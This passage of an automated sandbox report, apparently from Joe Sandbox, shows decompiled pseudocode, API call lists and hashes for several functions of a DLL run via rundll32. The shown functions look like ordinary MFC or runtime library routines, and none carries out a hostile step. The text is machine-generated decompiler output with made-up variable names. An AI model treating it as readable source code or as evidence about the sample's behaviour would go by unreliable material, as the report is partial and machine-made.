                                                                                                        • Opcode Fuzzy Hash: 4c4938c985efefa734c19c3610df5f4946220f96e44b0273001cdd498358f56c
                                                                                                        • Instruction Fuzzy Hash: 6F516A75D002599FDF12DFA4C885BEEB7B5FF08356F10001AE901BB290D775AA44CBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 71%
                                                                                                        			E100348E3(void* __ecx, void* __edx, void* __eflags, CHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                        				intOrPtr _v8;
                                                                                                        				intOrPtr _v12;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				void* _t32;
                                                                                                        				void* _t34;
                                                                                                        				intOrPtr _t35;
                                                                                                        				char* _t36;
                                                                                                        				int _t38;
                                                                                                        				CHAR* _t40;
                                                                                                        				CHAR* _t43;
                                                                                                        				void* _t45;
                                                                                                        				void* _t47;
                                                                                                        				void* _t49;
                                                                                                        				intOrPtr _t51;
                                                                                                        				void* _t52;
                                                                                                        				CHAR* _t54;
                                                                                                        				void* _t56;
                                                                                                        				int _t57;
                                                                                                        				intOrPtr _t58;
                                                                                                        				void* _t62;
                                                                                                        
                                                                                                        				_t52 = __edx;
                                                                                                        				_t50 = __ecx;
                                                                                                        				_push(__ecx);
                                                                                                        				_push(__ecx);
                                                                                                        				_push(_t45);
                                                                                                        				_push(_t56);
                                                                                                        				_t54 = _a4;
                                                                                                        				_push(0xffffffff);
                                                                                                        				_t32 = E10029AAF(_t54);
                                                                                                        				_t67 = _t32;
                                                                                                        				if(_t32 == 0) {
                                                                                                        					E1000836F(_t45, __ecx, _t54, _t56, _t67);
                                                                                                        				}
                                                                                                        				_t57 = lstrlenA(_t54);
                                                                                                        				_v8 = _t57;
                                                                                                        				_t34 = E100348A5(_t50, _t54, 0, 0);
                                                                                                        				_t51 = _v8;
                                                                                                        				_t47 = _t34 - 1;
                                                                                                        				_t58 = _t57 - _t47;
                                                                                                        				_t35 = _t58 + _t54;
                                                                                                        				_v12 = _t35;
                                                                                                        				if(_a8 < _t51) {
                                                                                                        					if(_a8 >= _t47) {
                                                                                                        						__eflags =  *_t54 - 0x5c;
                                                                                                        						_t36 =  &(_t54[2]);
                                                                                                        						_a4 = _t36;
                                                                                                        						if( *_t54 == 0x5c) {
                                                                                                        							__eflags = _t54[1] - 0x5c;
                                                                                                        							if(_t54[1] == 0x5c) {
                                                                                                        								while(1) {
                                                                                                        									__eflags =  *_t36 - 0x5c;
                                                                                                        									if( *_t36 == 0x5c) {
                                                                                                        										goto L13;
                                                                                                        									}
                                                                                                        									_t36 = E1003F61F(_t52, _t54, _a4);
                                                                                                        									_pop(_t51);
                                                                                                        									_a4 = _t36;
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        						L13:
                                                                                                        						__eflags = _t58 - 3;
                                                                                                        						if(_t58 > 3) {
                                                                                                        							do {
                                                                                                        								_t43 = E1003F61F(_t52, _t54, _a4);
                                                                                                        								__eflags =  *_t43 - 0x5c;
                                                                                                        								_a4 = _t43;
                                                                                                        								_pop(_t51);
                                                                                                        							} while ( *_t43 != 0x5c);
                                                                                                        						}
                                                                                                        						_t58 = _a4 - _t54;
                                                                                                        						__eflags = _a8 - _t58 + _t47 + 5;
                                                                                                        						if(_a8 >= _t58 + _t47 + 5) {
                                                                                                        							_t49 = lstrlenA;
                                                                                                        							while(1) {
                                                                                                        								_t38 = lstrlenA(_a4);
                                                                                                        								__eflags = _t38 + _t58 + 4 - _a8;
                                                                                                        								if(_t38 + _t58 + 4 > _a8) {
                                                                                                        									goto L18;
                                                                                                        								} else {
                                                                                                        									break;
                                                                                                        								}
                                                                                                        								do {
                                                                                                        									L18:
                                                                                                        									_t40 = E1003F61F(_t52, _t54, _a4);
                                                                                                        									__eflags =  *_t40 - 0x5c;
                                                                                                        									_pop(_t51);
                                                                                                        									_a4 = _t40;
                                                                                                        								} while ( *_t40 != 0x5c);
                                                                                                        							}
                                                                                                        							__eflags = _t58;
                                                                                                        							if(_t58 < 0) {
                                                                                                        								L22:
                                                                                                        								_t58 = _a8;
                                                                                                        							} else {
                                                                                                        								__eflags = _t58 - _a8;
                                                                                                        								if(_t58 >= _a8) {
                                                                                                        									goto L22;
                                                                                                        								}
                                                                                                        							}
                                                                                                        							_t61 = _t58 + _t54;
                                                                                                        							__eflags = _t58 + _t54;
                                                                                                        							E10001000(_t49, _t54, _t61, E1003A7F6(_t49, _t51, _t61, 5, "\\...", 5));
                                                                                                        							_t35 = E1001C44E(_t49, _t52, _t54, _t61, _t62, _t54, _v8, _a4);
                                                                                                        						} else {
                                                                                                        							_push(_v12);
                                                                                                        							_push(_v8);
                                                                                                        							goto L7;
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						if(_a12 != 0) {
                                                                                                        							_push(_t35);
                                                                                                        							_push(_t51);
                                                                                                        							L7:
                                                                                                        							_push(_t54);
                                                                                                        							_t35 = E10025E38(_t47, _t52, _t54, _t58, _t62);
                                                                                                        						} else {
                                                                                                        							 *_t54 = 0;
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        				return _t35;
                                                                                                        			}



























                                                                                                        APIs
                                                                                                        • lstrlenA.KERNEL32(?,?,000000FF), ref: 10034900
                                                                                                          • Part of subcall function 1000836F: __CxxThrowException@8.LIBCMT ref: 10008383
                                                                                                          • Part of subcall function 1000836F: __EH_prolog3.LIBCMT ref: 10008390
                                                                                                          • Part of subcall function 10025E38: _strcpy_s.LIBCMT ref: 10025E44
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8H_prolog3Throw_strcpy_slstrlen
                                                                                                        • String ID: \...
                                                                                                        • API String ID: 2411880420-1167917071
                                                                                                        • Opcode ID: 7ebd0e065f7e0f8261fabf429e50be93d96acefaedd4a01b35c5769590fda5e9
                                                                                                        • Instruction ID: 23a99ee26fe3352073cc3c031fbde906da005f448bef751663056bbc433d0a58
                                                                                                        • Opcode Fuzzy Hash: 7ebd0e065f7e0f8261fabf429e50be93d96acefaedd4a01b35c5769590fda5e9
                                                                                                        • Instruction Fuzzy Hash: B831B379804249BEEB12CF60CC81B9F7BA4EB01392F13815BF9546E151EB34BE80CB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10032191() {
                                                                                                        				void _t1;
                                                                                                        				struct HWND__* _t3;
                                                                                                        				int _t5;
                                                                                                        				int _t6;
                                                                                                        				intOrPtr _t8;
                                                                                                        				intOrPtr _t9;
                                                                                                        				short _t10;
                                                                                                        
                                                                                                        				_t8 =  *0x10097508; // 0x0
                                                                                                        				if(_t8 != 0) {
                                                                                                        					L11:
                                                                                                        					_t1 =  *0x100991f4; // 0x0
                                                                                                        					return _t1;
                                                                                                        				}
                                                                                                        				_t9 =  *0x10099164; // 0x0
                                                                                                        				 *0x10097508 = 1;
                                                                                                        				if(_t9 == 0) {
                                                                                                        					 *0x100991f4 = 3;
                                                                                                        					SystemParametersInfoA(0x68, 0, 0x100991f4, 0);
                                                                                                        					goto L11;
                                                                                                        				}
                                                                                                        				_t10 =  *0x100991fc; // 0x0
                                                                                                        				if(_t10 != 0) {
                                                                                                        					L6:
                                                                                                        					if( *0x100991fc == 2) {
                                                                                                        						_t3 = FindWindowA("MouseZ", "Magellan MSWHEEL");
                                                                                                        						if(_t3 != 0) {
                                                                                                        							_t6 =  *0x100991f8; // 0x0
                                                                                                        							if(_t6 != 0) {
                                                                                                        								 *0x100991f4 = SendMessageA(_t3, _t6, 0, 0);
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        					goto L11;
                                                                                                        				}
                                                                                                        				_t5 = RegisterWindowMessageA("MSH_SCROLL_LINES_MSG");
                                                                                                        				 *0x100991f8 = _t5;
                                                                                                        				if(_t5 != 0) {
                                                                                                        					 *0x100991fc = 2;
                                                                                                        					goto L6;
                                                                                                        				} else {
                                                                                                        					 *0x100991fc = 1;
                                                                                                        					goto L11;
                                                                                                        				}
                                                                                                        			}











                                                                                                        APIs
                                                                                                        • RegisterWindowMessageA.USER32(MSH_SCROLL_LINES_MSG,?,10032E2E,?,?,?), ref: 100321C0
                                                                                                        • FindWindowA.USER32 ref: 100321F7
                                                                                                        • SendMessageA.USER32 ref: 1003220F
                                                                                                        • SystemParametersInfoA.USER32(00000068,00000000,100991F4,00000000), ref: 1003222F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageWindow$FindInfoParametersRegisterSendSystem
                                                                                                        • String ID: MSH_SCROLL_LINES_MSG$Magellan MSWHEEL$MouseZ
                                                                                                        • API String ID: 4054807749-4062084571
                                                                                                        • Opcode ID: 321a152e966f862fa2d6c977898e6ffb590373fcfbc6b5d2ac9cb4234ab4388c
                                                                                                        • Instruction ID: 566a71785a45a982e63a39b7aafdbf4ee296ba1814393e036d7cdc7bb21956e8
                                                                                                        • Opcode Fuzzy Hash: 321a152e966f862fa2d6c977898e6ffb590373fcfbc6b5d2ac9cb4234ab4388c
                                                                                                        • Instruction Fuzzy Hash: 37015A34401237EEE75BCF09CDCCE9A3AA4F70D78AB01400BE61D9A1A0D7B40984CB95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 93%
                                                                                                        			E10026A32(void* __ecx, char* _a4) {
                                                                                                        				void* _v8;
                                                                                                        				void* _t15;
                                                                                                        				void* _t20;
                                                                                                        				void* _t35;
                                                                                                        
                                                                                                        				_push(__ecx);
                                                                                                        				_t35 = __ecx;
                                                                                                        				_t15 =  *(__ecx + 0x74);
                                                                                                        				if(_t15 != 0) {
                                                                                                        					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
                                                                                                        					if(_t15 == 0) {
                                                                                                        						_t15 = OpenPrinterA(_a4,  &_v8, 0);
                                                                                                        						if(_t15 != 0) {
                                                                                                        							_t18 =  *(_t35 + 0x70);
                                                                                                        							if( *(_t35 + 0x70) != 0) {
                                                                                                        								E100297B1(_t18);
                                                                                                        							}
                                                                                                        							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
                                                                                                        							 *(_t35 + 0x70) = _t20;
                                                                                                        							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
                                                                                                        								E100297B1( *(_t35 + 0x70));
                                                                                                        								 *(_t35 + 0x70) = 0;
                                                                                                        							}
                                                                                                        							_t15 = ClosePrinter(_v8);
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        				return _t15;
                                                                                                        			}








                                                                                                        APIs
                                                                                                        • GlobalLock.KERNEL32 ref: 10026A4F
                                                                                                        • lstrcmpA.KERNEL32(?,?), ref: 10026A5B
                                                                                                        • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 10026A6D
                                                                                                        • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10026A8D
                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10026A95
                                                                                                        • GlobalLock.KERNEL32 ref: 10026A9F
                                                                                                        • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 10026AAC
                                                                                                        • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 10026AC4
                                                                                                          • Part of subcall function 100297B1: GlobalFlags.KERNEL32(?), ref: 100297BC
                                                                                                          • Part of subcall function 100297B1: GlobalUnlock.KERNEL32(?), ref: 100297CE
                                                                                                          • Part of subcall function 100297B1: GlobalFree.KERNEL32 ref: 100297D9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                        • String ID:
                                                                                                        • API String ID: 168474834-0
                                                                                                        • Opcode ID: 1165fe8e980ef602a1d33f80695f4609020bd6e14c1fdcb869a18ffa74b77181
                                                                                                        • Instruction ID: 0e9a69045ef64a82a052e1c19841c0e81e1576c4a80d39e7c088a39ac51c58da
                                                                                                        • Opcode Fuzzy Hash: 1165fe8e980ef602a1d33f80695f4609020bd6e14c1fdcb869a18ffa74b77181
                                                                                                        • Instruction Fuzzy Hash: 33117C79500604BBDB12DBB5DC89D6F7AFDFF89B84750441AFA01E2121D731EA01DB20
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E1000AE74(void* __ecx, void* _a4, void* _a8) {
                                                                                                        				long _v8;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				long _t10;
                                                                                                        				void* _t12;
                                                                                                        				void* _t14;
                                                                                                        				void* _t21;
                                                                                                        				void* _t25;
                                                                                                        				void* _t32;
                                                                                                        
                                                                                                        				_t25 = GlobalSize;
                                                                                                        				_t10 = GlobalSize(_a8);
                                                                                                        				_t21 = _a4;
                                                                                                        				_v8 = _t10;
                                                                                                        				if(_t21 != 0) {
                                                                                                        					if(_v8 > GlobalSize(_t21)) {
                                                                                                        						goto L2;
                                                                                                        					} else {
                                                                                                        						goto L4;
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					_t21 = GlobalAlloc(0x2002, _t10);
                                                                                                        					if(_t21 != 0) {
                                                                                                        						L4:
                                                                                                        						_a4 = GlobalLock(_a8);
                                                                                                        						_t14 = GlobalLock(_t21);
                                                                                                        						E10007E59(_t25, _t14, _t32, _t14, GlobalSize(_t21), _a4, _v8);
                                                                                                        						GlobalUnlock(_t21);
                                                                                                        						GlobalUnlock(_a8);
                                                                                                        						_t12 = _t21;
                                                                                                        					} else {
                                                                                                        						L2:
                                                                                                        						_t12 = 0;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				return _t12;
                                                                                                        			}














                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Global$Size$LockUnlock$Alloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 2344174106-0
                                                                                                        • Opcode ID: ab99f5e5b1cf080de97b526d5757064fac85f5db4826d33b5b69dcac7ca7df73
                                                                                                        • Instruction ID: 00437f95888d8e729627b736a01413f4f87f9df8a85beca872755ae450b9b6d4
                                                                                                        • Opcode Fuzzy Hash: ab99f5e5b1cf080de97b526d5757064fac85f5db4826d33b5b69dcac7ca7df73
                                                                                                        • Instruction Fuzzy Hash: D9017171900258BFEB00AF66CCC485F7FACEF446D47108166FD08A3111E670AE109BA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 63%
                                                                                                        			E100122B1(intOrPtr* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                        				signed int _v8;
                                                                                                        				char _v17;
                                                                                                        				char _v18;
                                                                                                        				signed int _v19;
                                                                                                        				char _v28;
                                                                                                        				long _v32;
                                                                                                        				signed int _v36;
                                                                                                        				char _v52;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				signed int _t43;
                                                                                                        				signed int _t50;
                                                                                                        				signed char _t57;
                                                                                                        				void* _t68;
                                                                                                        				void* _t86;
                                                                                                        				intOrPtr* _t87;
                                                                                                        				intOrPtr* _t88;
                                                                                                        				signed int _t89;
                                                                                                        
                                                                                                        				_t86 = __edx;
                                                                                                        				_t43 =  *0x10072650; // 0xb5e27fef
                                                                                                        				_v8 = _t43 ^ _t89;
                                                                                                        				_t87 = _a8;
                                                                                                        				_t88 = __ecx;
                                                                                                        				_push( &_v28);
                                                                                                        				_push(_a4);
                                                                                                        				_push(0x417);
                                                                                                        				 *((intOrPtr*)( *__ecx + 0x110))();
                                                                                                        				 *(_t87 + 8) =  *(_t87 + 8) ^ 0x00000004;
                                                                                                        				_v18 = 0;
                                                                                                        				_v17 = 0;
                                                                                                        				 *((char*)(_t87 + 0xa)) = 0;
                                                                                                        				 *((char*)(_t87 + 0xb)) = 0;
                                                                                                        				if(E1003D322(_t87,  &_v28, 0x14) != 0) {
                                                                                                        					_t50 = E10011632(_t88);
                                                                                                        					_t69 = _t50;
                                                                                                        					_v36 = _t50;
                                                                                                        					E10011666(_t88, 0x10000000, 0, 0);
                                                                                                        					 *((intOrPtr*)( *_t88 + 0x110))(0x416, _a4, 0, _t68);
                                                                                                        					if( *((intOrPtr*)(_t87 + 0x10)) < 0xffffffff) {
                                                                                                        						_v32 = SendMessageA( *(_t88 + 0x20), 0x43d, 0, 0);
                                                                                                        						SendMessageA( *(_t88 + 0x20), 0xb, 0, 0);
                                                                                                        						SendMessageA( *(_t88 + 0x20), 0x43c, _v32 + 1, 0);
                                                                                                        						SendMessageA( *(_t88 + 0x20), 0x43c, _v32, 0);
                                                                                                        						SendMessageA( *(_t88 + 0x20), 0xb, 1, 0);
                                                                                                        						 *((intOrPtr*)(_t87 + 0x10)) =  *((intOrPtr*)(_t87 + 0x10)) + 0xf4240;
                                                                                                        						_t69 = _v36;
                                                                                                        					}
                                                                                                        					 *((intOrPtr*)( *_t88 + 0x110))(_a4, _t87);
                                                                                                        					E10011666(_t88, 0, _t69 & 0x10000000, 0);
                                                                                                        					_t57 =  *((intOrPtr*)(_t87 + 9));
                                                                                                        					_t68 = 0x415;
                                                                                                        					if(((_t57 ^ _v19) & 0x00000001) != 0 || (_t57 & 0x00000001) != 0 &&  *_t87 != _v28) {
                                                                                                        						_push(1);
                                                                                                        						_push(0);
                                                                                                        						goto L9;
                                                                                                        					} else {
                                                                                                        						_push( &_v52);
                                                                                                        						_push(_a4);
                                                                                                        						_push(0x41d);
                                                                                                        						if( *((intOrPtr*)( *_t88 + 0x110))() != 0) {
                                                                                                        							_push(1);
                                                                                                        							_push( &_v52);
                                                                                                        							L9:
                                                                                                        							_t48 = InvalidateRect( *(_t88 + 0x20), ??, ??);
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        				return E10039F21(_t48, _t68, _v8 ^ _t89, _t86, _t87, _t88);
                                                                                                        			}


                                                                                                        APIs
                                                                                                        • _memcmp.LIBCMT ref: 100122F9
                                                                                                          • Part of subcall function 10011632: GetWindowLongA.USER32 ref: 1001163D
                                                                                                        • SendMessageA.USER32 ref: 10012352
                                                                                                        • SendMessageA.USER32 ref: 10012360
                                                                                                        • SendMessageA.USER32 ref: 10012371
                                                                                                        • SendMessageA.USER32 ref: 10012380
                                                                                                        • SendMessageA.USER32 ref: 1001238B
                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 100123FE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$InvalidateLongRectWindow_memcmp
                                                                                                        • String ID:
                                                                                                        • API String ID: 235743446-0
                                                                                                        • Opcode ID: e52b8cadc8a241264832bf51a5e6ebb2303414c0d9b285d22f04d0475322bfc3
                                                                                                        • Instruction ID: c9a32e73d8042cfdadecad21669b4801cf05de11b689baf54d6faadfb4b2740c
                                                                                                        • Opcode Fuzzy Hash: e52b8cadc8a241264832bf51a5e6ebb2303414c0d9b285d22f04d0475322bfc3
                                                                                                        • Instruction Fuzzy Hash: 2C418E70640308BFEB15DB60CC56FEEBBA4FF08B54F004518FA956A1D1C7B5AA90CB54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 96%
                                                                                                        			E1000E17B(intOrPtr* __ecx, signed int _a4) {
                                                                                                        				struct HWND__* _v4;
                                                                                                        				struct tagMSG* _v8;
                                                                                                        				int _v12;
                                                                                                        				int _v16;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				struct HWND__* _t42;
                                                                                                        				struct tagMSG* _t43;
                                                                                                        				signed int _t45;
                                                                                                        				void* _t48;
                                                                                                        				void* _t50;
                                                                                                        				int _t53;
                                                                                                        				long _t56;
                                                                                                        				signed int _t62;
                                                                                                        				intOrPtr* _t64;
                                                                                                        				intOrPtr* _t67;
                                                                                                        				void* _t68;
                                                                                                        
                                                                                                        				_t63 = __ecx;
                                                                                                        				_t62 = 1;
                                                                                                        				_t67 = __ecx;
                                                                                                        				_v12 = 1;
                                                                                                        				_v16 = 0;
                                                                                                        				if((_a4 & 0x00000004) == 0 || (E10011632(__ecx) & 0x10000000) != 0) {
                                                                                                        					_t62 = 0;
                                                                                                        				}
                                                                                                        				_t42 = GetParent( *(_t67 + 0x20));
                                                                                                        				 *(_t67 + 0x3c) =  *(_t67 + 0x3c) | 0x00000018;
                                                                                                        				_v4 = _t42;
                                                                                                        				_t43 = E10028B7A(0);
                                                                                                        				_t68 = UpdateWindow;
                                                                                                        				_v8 = _t43;
                                                                                                        				while(1) {
                                                                                                        					L14:
                                                                                                        					_t73 = _v12;
                                                                                                        					if(_v12 == 0) {
                                                                                                        						goto L15;
                                                                                                        					}
                                                                                                        					__eflags = PeekMessageA(_v8, 0, 0, 0, 0);
                                                                                                        					if(__eflags != 0) {
                                                                                                        						while(1) {
                                                                                                        							L15:
                                                                                                        							_t45 = E10028F57(_t63, 0, _t67, _t73);
                                                                                                        							if(_t45 == 0) {
                                                                                                        								break;
                                                                                                        							}
                                                                                                        							if(_t62 != 0) {
                                                                                                        								_t53 = _v8->message;
                                                                                                        								if(_t53 == 0x118 || _t53 == 0x104) {
                                                                                                        									E10011739(_t67, 1);
                                                                                                        									UpdateWindow( *(_t67 + 0x20));
                                                                                                        									_t62 = 0;
                                                                                                        								}
                                                                                                        							}
                                                                                                        							_t64 = _t67;
                                                                                                        							_t48 =  *((intOrPtr*)( *_t67 + 0x80))();
                                                                                                        							_t79 = _t48;
                                                                                                        							if(_t48 == 0) {
                                                                                                        								_t39 = _t67 + 0x3c;
                                                                                                        								 *_t39 =  *(_t67 + 0x3c) & 0xffffffe7;
                                                                                                        								__eflags =  *_t39;
                                                                                                        								return  *((intOrPtr*)(_t67 + 0x44));
                                                                                                        							} else {
                                                                                                        								_t50 = E10028E71(_t62, _t64, 0, _t67, _t68, _t79, _v8);
                                                                                                        								_pop(_t63);
                                                                                                        								if(_t50 != 0) {
                                                                                                        									_v12 = 1;
                                                                                                        									_v16 = 0;
                                                                                                        								}
                                                                                                        								if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
                                                                                                        									continue;
                                                                                                        								} else {
                                                                                                        									goto L14;
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        						_push(0);
                                                                                                        						E10026933();
                                                                                                        						return _t45 | 0xffffffff;
                                                                                                        					}
                                                                                                        					__eflags = _t62;
                                                                                                        					if(_t62 != 0) {
                                                                                                        						_t63 = _t67;
                                                                                                        						E10011739(_t67, 1);
                                                                                                        						UpdateWindow( *(_t67 + 0x20));
                                                                                                        						_t62 = 0;
                                                                                                        						__eflags = 0;
                                                                                                        					}
                                                                                                        					__eflags = _a4 & 0x00000001;
                                                                                                        					if((_a4 & 0x00000001) == 0) {
                                                                                                        						__eflags = _v4;
                                                                                                        						if(_v4 != 0) {
                                                                                                        							__eflags = _v16;
                                                                                                        							if(_v16 == 0) {
                                                                                                        								SendMessageA(_v4, 0x121, 0,  *(_t67 + 0x20));
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        					__eflags = _a4 & 0x00000002;
                                                                                                        					if(__eflags != 0) {
                                                                                                        						L13:
                                                                                                        						_v12 = 0;
                                                                                                        						continue;
                                                                                                        					} else {
                                                                                                        						_t56 = SendMessageA( *(_t67 + 0x20), 0x36a, 0, _v16);
                                                                                                        						_v16 = _v16 + 1;
                                                                                                        						__eflags = _t56;
                                                                                                        						if(__eflags != 0) {
                                                                                                        							continue;
                                                                                                        						}
                                                                                                        						goto L13;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				goto L15;
                                                                                                        			}

                                                                                                        0x1000e280
                                                                                                        0x1000e284
                                                                                                        0x1000e28b
                                                                                                        0x1000e28c
                                                                                                        0x1000e28e
                                                                                                        0x1000e296
                                                                                                        0x1000e296
                                                                                                        0x1000e2aa
                                                                                                        0x00000000
                                                                                                        0x1000e2ac
                                                                                                        0x00000000
                                                                                                        0x1000e2ac
                                                                                                        0x1000e2aa
                                                                                                        0x1000e27e
                                                                                                        0x1000e2ae
                                                                                                        0x1000e2af
                                                                                                        0x00000000
                                                                                                        0x1000e2b4
                                                                                                        0x1000e1da
                                                                                                        0x1000e1dc
                                                                                                        0x1000e1e0
                                                                                                        0x1000e1e2
                                                                                                        0x1000e1ea
                                                                                                        0x1000e1ec
                                                                                                        0x1000e1ec
                                                                                                        0x1000e1ec
                                                                                                        0x1000e1ee
                                                                                                        0x1000e1f3
                                                                                                        0x1000e1f5
                                                                                                        0x1000e1f9
                                                                                                        0x1000e1fb
                                                                                                        0x1000e1ff
                                                                                                        0x1000e20e
                                                                                                        0x1000e20e
                                                                                                        0x1000e1ff
                                                                                                        0x1000e1f9
                                                                                                        0x1000e214
                                                                                                        0x1000e219
                                                                                                        0x1000e236
                                                                                                        0x1000e236
                                                                                                        0x00000000
                                                                                                        0x1000e21b
                                                                                                        0x1000e228
                                                                                                        0x1000e22e
                                                                                                        0x1000e232
                                                                                                        0x1000e234
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000e234
                                                                                                        0x1000e219
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • GetParent.USER32(?), ref: 1000E1A9
